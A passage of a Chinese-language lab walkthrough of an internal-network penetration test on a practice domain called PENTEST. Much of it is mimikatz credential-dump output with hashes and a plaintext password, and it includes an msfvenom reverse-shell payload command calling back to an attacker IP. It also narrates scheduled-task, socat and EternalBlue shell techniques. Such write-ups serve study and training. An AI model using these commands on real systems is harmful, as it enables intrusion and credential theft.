	 * SHA1     : b0af5d9bb628c0c507750b48d4e153da429fbaa6
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 2387905 (00000000:00246fc1)
Session           : RemoteInteractive from 2
User Name         : liming
Domain            : PENTEST
Logon Server      : WIN-QJ9CO8DHNTS
Logon Time        : 2021/3/7 15:01:05
SID               : S-1-5-21-3110820879-2626127139-941633094-1106
	msv :	
	 [00000003] Primary
	 * Username : liming
	 * Domain   : PENTEST
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	 [00010000] CredentialKeys
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	tspkg :	
	wdigest :	
	 * Username : liming
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : liming
	 * Domain   : PENTEST.COM
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 2387881 (00000000:00246fa9)
Session           : RemoteInteractive from 2
User Name         : liming
Domain            : PENTEST
Logon Server      : WIN-QJ9CO8DHNTS
Logon Time        : 2021/3/7 15:01:05
SID               : S-1-5-21-3110820879-2626127139-941633094-1106
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	 [00000003] Primary
	 * Username : liming
	 * Domain   : PENTEST
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	tspkg :	
	wdigest :	
	 * Username : liming
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : liming
	 * Domain   : pentest.com
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 2383871 (00000000:00245fff)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2021/3/7 15:01:04
SID               : S-1-5-90-2
	msv :	
	 [00000003] Primary
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * NTLM     : 47a19e53b983df9d382628f16af22ded
	 * SHA1     : b0af5d9bb628c0c507750b48d4e153da429fbaa6
	tspkg :	
	wdigest :	
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : DC2012$
	 * Domain   : pentest.com
	 * Password : d0 2a b2 b4 e8 73 96 b5 21 51 af 1d a3 38 d3 a9 47 f4 70 bd 6b 5b 92 e6 f7 98 f5 1a b5 13 c7 d3 2d 31 52 3b c9 a7 2b 67 3f 9c 3d 87 8d 96 d5 a9 e2 75 4d 81 35 82 11 83 c2 68 37 c2 78 c3 7f de 93 01 6c 8e 55 b3 c0 51 8d 5b 2d ee 31 81 65 9c 76 f3 19 3e a8 68 d2 e4 9d 4e 98 8c 12 20 68 a3 b5 2e 1c 04 f1 79 5f 44 99 a8 fc 16 6c 25 9c 46 5b 54 53 d8 3e a4 5c cd ac 50 f9 1e 2c 66 6e a6 25 33 7f a1 db b8 8e ce 6a eb 0f dc ed e1 bd e5 76 04 7d 5f 1e 0f ef a9 28 ff 7e af d2 75 be 61 dc 2d 5f e7 1c f6 c8 85 a6 47 0d df d3 90 68 07 4f 19 5a 2e 44 dd b9 23 e3 81 ec 89 37 73 62 3b 4d 63 12 c1 f5 ae 46 a8 a8 01 60 b3 42 fd d7 d9 b1 cd 93 00 b4 5a 8c 78 e2 a2 3e df b3 b2 52 98 b6 24 86 61 05 e6 fd 80 47 12 41 23 47 73 be c2 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 747785 (00000000:000b6909)
Session           : Interactive from 1
User Name         : lijun
Domain            : PENTEST
Logon Server      : WIN-QJ9CO8DHNTS
Logon Time        : 2021/3/6 20:39:49
SID               : S-1-5-21-3110820879-2626127139-941633094-1108
	msv :	
	 [00000003] Primary
	 * Username : lijun
	 * Domain   : PENTEST
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	 [00010000] CredentialKeys
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	tspkg :	
	wdigest :	
	 * Username : lijun
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : lijun
	 * Domain   : PENTEST.COM
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 747739 (00000000:000b68db)
Session           : Interactive from 1
User Name         : lijun
Domain            : PENTEST
Logon Server      : WIN-QJ9CO8DHNTS
Logon Time        : 2021/3/6 20:39:49
SID               : S-1-5-21-3110820879-2626127139-941633094-1108
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	 [00000003] Primary
	 * Username : lijun
	 * Domain   : PENTEST
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	tspkg :	
	wdigest :	
	 * Username : lijun
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : lijun
	 * Domain   : PENTEST.COM
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2021/3/6 16:59:02
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DC2012$
Domain            : PENTEST
Logon Server      : (null)
Logon Time        : 2021/3/6 16:59:01
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : DC2012$
	 * Domain   : PENTEST
	 * Password : (null)
	kerberos :	
	 * Username : dc2012$
	 * Domain   : PENTEST.COM
	 * Password : (null)
	ssp :	KO
	credman :	

mimikatz # Bye!

emmm,依然之抓到了 hash ,这里可以尝试对 hash 进行爆破,或者使用 hash传递 。。不过这个环境似乎不太合适。

至此,就拿下了 WIN2012 了。


* WIN7(172.16.243.223):

这里就不说这么多了。依然以 WIN2008 作为跳板去攻击吧。

- getshell:

- $IPC getshell:

还是在 远程桌面 这里操作,这样直观些,其实纯命令行也是同样道理。

image-20210306192234588

现在得到了 任意文件增删读写 的能力了,这里就不多说了,还是全都试一遍吧。

  • 第一种,使用 定时任务 + msf木马

    先生成 msf木马

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.243.222 LPORT=3325 -f exe > 7.exe

    image-20210306191902543

    然后就是上传啥的了,直接略过吧。

    image-20210306192314277

    msf 开启监听:

    image-20210306192431035

    试试定时任务:

    image-20210306192618451

    看起来是成功加入 定时任务 了,不过没有会话被创建,可能是 WIN7 机子的时间问题。

    检查了一下,并不是时间问题:

    image-20210306192847301

    再次尝试发现还是不太行,难道是防火墙之类的问题。

  • 第二种,尝试打开 telnet

    emmm,还是先用 opentelnet 尝试开启吧:

    image-20210306194057549

    看起来应该是失败了:

    image-20210306194128405

    尝试另一种方式:

    image-20210306194443669

    emmmm,失败了。

  • 第三种,使用及其麻烦的 socat ?:

    这个应该是最后招式了。先新建一个 C:\Temp 目录,然后按照之前的进行吧。

    • 反向shell:

      image-20210306195548317

      看起来是失败了。

    • 正向shell:

      image-20210306200005890

      emmm,还行不行,严重怀疑这个定时任务是个假的。。。要么就是 WIN2008 的问题了。

还是 防火墙 !!!现在我已经关闭 WIN2008 的防火墙了,再次尝试!

> 获取 cmdshell

首先是 socat 方式去 getshell

  • 反向shell:

    emmm,看起来还是不太行。

    image-20210307161159669

  • 正向shell:

    成功了!!!

    image-20210307161336500

尝试添加一个用户吧:

image-20210307161623431

OK!接下来是用 定时任务 + msf木马

> 获取 meterpretershell

先生成一个另外端口的简单的 msf木马 吧:

image-20210307162139569

然后是 监听定时任务 一气呵成:

image-20210307162350814

emmm,看起来并没有成功。那么试试 msf 的正向shell:

image-20210307163343588

然后用 定时任务 启动 msf木马 并且使用 msf 连接:

image-20210307163603931

成功了!!!

- 445永恒之蓝 getshell:

话不多说,直接上 msf

还是同样的问题,WIN2008meterpretershell 会话一直关,无法做跳板。整吐了。

直接尝试用另一个开启 远程桌面 吧,然而并不行:

image-20210306205300823

> 获取 cmdshell

emmmm,对了,现在我把 WIN2008防火墙 给关了!!!然后再试试:

image-20210307164515539

成功了,试试提升一下 shell

> 获取 meterpretershell

可以尝试用 cmdshell 直接提升:

use post/multi/manage/shell_to_meterpreter

image-20210307164717866

OK,成功了!

- 权限提升:

还是先看当前用户权限:

image-20210307164807181

很好,然后是尝试 迁徙

image-20210307164903101

尝试 创建用户 吧:

image-20210307165008926

OK,加权限:

image-20210307165034529

- 抓密码:

emmm,还是直接上 kiwi 吧:

image-20210307173337707

不太行呀,不妨上传 mimikatz 的二进制文件试试。

- 远程登录:

直接打开 远程桌面

不过在 WIN7 这么做会把当前用户给挤下来的。行吧,现在是可以登上去了。

image-20210307181926113

- 继续抓密码:

emmm,还是上传 mimikatz 的二进制文件试试吧。

image-20210307182148094

然后尝试抓密码:

image-20210307182456864

得到结果:


  .#####.   mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 436843 (00000000:0006aa6b)
Session           : RemoteInteractive from 2
User Name         : dq3
Domain            : WIN7PC
Logon Server      : WIN7PC
Logon Time        : 3/7/2021 6:17:47 PM
SID               : S-1-5-21-3896396058-1421024651-3276018989-1001
	msv :	
	 [00000003] Primary
	 * Username : dq3
	 * Domain   : WIN7PC
	 * LM       : e62b17732338d7586e72264e11f708c0
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	tspkg :	
	 * Username : dq3
	 * Domain   : WIN7PC
	 * Password : Qwe123!!!
	wdigest :	
	 * Username : dq3
	 * Domain   : WIN7PC
	 * Password : Qwe123!!!
	kerberos :	
	 * Username : dq3
	 * Domain   : WIN7PC
	 * Password : Qwe123!!!
	ssp :	
	credman :	

Authentication Id : 0 ; 436812 (00000000:0006aa4c)
Session           : RemoteInteractive from 2
User Name         : dq3
Domain            : WIN7PC
Logon Server      : WIN7PC
Logon Time        : 3/7/2021 6:17:47 PM
SID               : S-1-5-21-3896396058-1421024651-3276018989-1001
	msv :	
	 [00000003] Primary
	 * Username : dq3
	 * Domain   : WIN7PC
	 * LM       : e62b17732338d7586e72264e11f708c0
	 * NTLM     : 1537fe1ed860996391d04a916cf9eb20
	 * SHA1     : a0912f3a7b57e6d2a683178eb586267dca6b312d
	tspkg :	
	 * Username : dq3
	 * Domain   : WIN7PC
	 * Password : Qwe123!!!
	wdigest :	
	 * Username : dq3
	 * Domain   : WIN7PC
	 * Password : Qwe123!!!
	kerberos :	
	 * Username : dq3
	 * Domain   : WIN7PC
	 * Password : Qwe123!!!
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/7/2021 6:01:59 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN7PC$
Domain            : PENTEST
Logon Server      : (null)
Logon Time        : 3/7/2021 6:01:59 PM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : WIN7PC$
	 * Domain   : PENTEST
	 * NTLM     : d474d4af5ae26f8e920338d5abd04d2c
	 * SHA1     : e1c2cf6893a6d001872c129fc79a66b438ff393f
	tspkg :	
	wdigest :	
	 * Username : WIN7PC$
	 * Domain   : PENTEST
	 * Password : d1 42 2a 9b 68 fa d9 a7 cd c9 5e ba aa 09 8e a1 f7 7a 81 d5 49 be 5a 6f 3c d4 7b b3 e0 fb 4c 45 44 5a 9f d0 65 ab 64 7e ba af f6 37 71 96 da da 01 16 58 a2 f6 70 00 53 e6 78 8d 40 cd d5 82 f1 27 15 79 a6 b8 d8 2a 62 0d 10 94 20 a0 f5 33 72 c9 b0 55 ec a2 87 80 fd e5 f7 eb 2b 94 bc b9 09 f9 bc 0c 19 6c d1 76 a4 ce 18 2e 41 0f e8 5e 9b 6d 5d 34 aa 9b aa 81 b8 71 43 0c c5 da b7 36 83 59 dd e3 d9 92 fc 10 e3 30 b9 0e b3 d1 10 a2 3b 9d fa f7 ca 41 fa c2 5a 58 19 ad ee 7b 40 93 e7 a7 3a d9 85 46 53 88 69 9e a9 32 68 2a 03 01 38 3e 0d f4 03 a8 04 a9 29 1c d0 32 77 74 52 dd fb f1 47 0a 7e e3 d8 7c b2 eb e8 d4 84 68 d4 53 f6 69 b9 e5 92 a6 03 60 76 c5 25 ef 02 76 d6 13 10 ba 19 c2 1b 30 92 b1 6c 97 ff e1 02 2f 0f db b4 
	kerberos :	
	 * Username : win7pc$
	 * Domain   : PENTEST.COM
	 * Password : d1 42 2a 9b 68 fa d9 a7 cd c9 5e ba aa 09 8e a1 f7 7a 81 d5 49 be 5a 6f 3c d4 7b b3 e0 fb 4c 45 44 5a 9f d0 65 ab 64 7e ba af f6 37 71 96 da da 01 16 58 a2 f6 70 00 53 e6 78 8d 40 cd d5 82 f1 27 15 79 a6 b8 d8 2a 62 0d 10 94 20 a0 f5 33 72 c9 b0 55 ec a2 87 80 fd e5 f7 eb 2b 94 bc b9 09 f9 bc 0c 19 6c d1 76 a4 ce 18 2e 41 0f e8 5e 9b 6d 5d 34 aa 9b aa 81 b8 71 43 0c c5 da b7 36 83 59 dd e3 d9 92 fc 10 e3 30 b9 0e b3 d1 10 a2 3b 9d fa f7 ca 41 fa c2 5a 58 19 ad ee 7b 40 93 e7 a7 3a d9 85 46 53 88 69 9e a9 32 68 2a 03 01 38 3e 0d f4 03 a8 04 a9 29 1c d0 32 77 74 52 dd fb f1 47 0a 7e e3 d8 7c b2 eb e8 d4 84 68 d4 53 f6 69 b9 e5 92 a6 03 60 76 c5 25 ef 02 76 d6 13 10 ba 19 c2 1b 30 92 b1 6c 97 ff e1 02 2f 0f db b4 
	ssp :	
	credman :	

Authentication Id : 0 ; 51341 (00000000:0000c88d)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 3/7/2021 6:01:59 PM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : WIN7PC$
	 * Domain   : PENTEST
	 * NTLM     : d474d4af5ae26f8e920338d5abd04d2c
	 * SHA1     : e1c2cf6893a6d001872c129fc79a66b438ff393f
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN7PC$
Domain            : PENTEST
Logon Server      : (null)
Logon Time        : 3/7/2021 6:01:59 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : WIN7PC$
	 * Domain   : PENTEST
	 * Password : d1 42 2a 9b 68 fa d9 a7 cd c9 5e ba aa 09 8e a1 f7 7a 81 d5 49 be 5a 6f 3c d4 7b b3 e0 fb 4c 45 44 5a 9f d0 65 ab 64 7e ba af f6 37 71 96 da da 01 16 58 a2 f6 70 00 53 e6 78 8d 40 cd d5 82 f1 27 15 79 a6 b8 d8 2a 62 0d 10 94 20 a0 f5 33 72 c9 b0 55 ec a2 87 80 fd e5 f7 eb 2b 94 bc b9 09 f9 bc 0c 19 6c d1 76 a4 ce 18 2e 41 0f e8 5e 9b 6d 5d 34 aa 9b aa 81 b8 71 43 0c c5 da b7 36 83 59 dd e3 d9 92 fc 10 e3 30 b9 0e b3 d1 10 a2 3b 9d fa f7 ca 41 fa c2 5a 58 19 ad ee 7b 40 93 e7 a7 3a d9 85 46 53 88 69 9e a9 32 68 2a 03 01 38 3e 0d f4 03 a8 04 a9 29 1c d0 32 77 74 52 dd fb f1 47 0a 7e e3 d8 7c b2 eb e8 d4 84 68 d4 53 f6 69 b9 e5 92 a6 03 60 76 c5 25 ef 02 76 d6 13 10 ba 19 c2 1b 30 92 b1 6c 97 ff e1 02 2f 0f db b4 
	kerberos :	
	 * Username : win7pc$
	 * Domain   : PENTEST.COM
	 * Password : d1 42 2a 9b 68 fa d9 a7 cd c9 5e ba aa 09 8e a1 f7 7a 81 d5 49 be 5a 6f 3c d4 7b b3 e0 fb 4c 45 44 5a 9f d0 65 ab 64 7e ba af f6 37 71 96 da da 01 16 58 a2 f6 70 00 53 e6 78 8d 40 cd d5 82 f1 27 15 79 a6 b8 d8 2a 62 0d 10 94 20 a0 f5 33 72 c9 b0 55 ec a2 87 80 fd e5 f7 eb 2b 94 bc b9 09 f9 bc 0c 19 6c d1 76 a4 ce 18 2e 41 0f e8 5e 9b 6d 5d 34 aa 9b aa 81 b8 71 43 0c c5 da b7 36 83 59 dd e3 d9 92 fc 10 e3 30 b9 0e b3 d1 10 a2 3b 9d fa f7 ca 41 fa c2 5a 58 19 ad ee 7b 40 93 e7 a7 3a d9 85 46 53 88 69 9e a9 32 68 2a 03 01 38 3e 0d f4 03 a8 04 a9 29 1c d0 32 77 74 52 dd fb f1 47 0a 7e e3 d8 7c b2 eb e8 d4 84 68 d4 53 f6 69 b9 e5 92 a6 03 60 76 c5 25 ef 02 76 d6 13 10 ba 19 c2 1b 30 92 b1 6c 97 ff e1 02 2f 0f db b4 
	ssp :	
	credman :	

mimikatz # Bye!

emmm,只得到了刚刚新建用户 dq3 的明文密码,和一些 hash

至此,就拿下了 WIN7 了。


三、最后总结:

整个流程不得不说还蛮曲折的,就仅仅用了 msf 将整个内网渗透到底了,也应该算是把所会的都一次性付诸了吧,像什么 CS 这个工具还没怎么去认真研究怎么用诶,慢慢学了,无论如何下次一定会更好的。

——台阶边的小小的花被人踩灭,无论它开放得有多微弱,它都准备了一个冬天。青草弯着腰歌唱。云彩和时间都流淌得一去不复返。

虽然说并未涉及到 后渗透 ,最后还是留一个纪念吧:

image-20210307183048075

后边会慢慢补上。